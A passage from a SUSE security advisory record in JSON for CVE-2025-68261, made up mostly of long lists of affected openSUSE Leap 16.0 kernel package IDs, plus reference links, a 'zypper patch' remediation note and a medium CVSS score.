"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
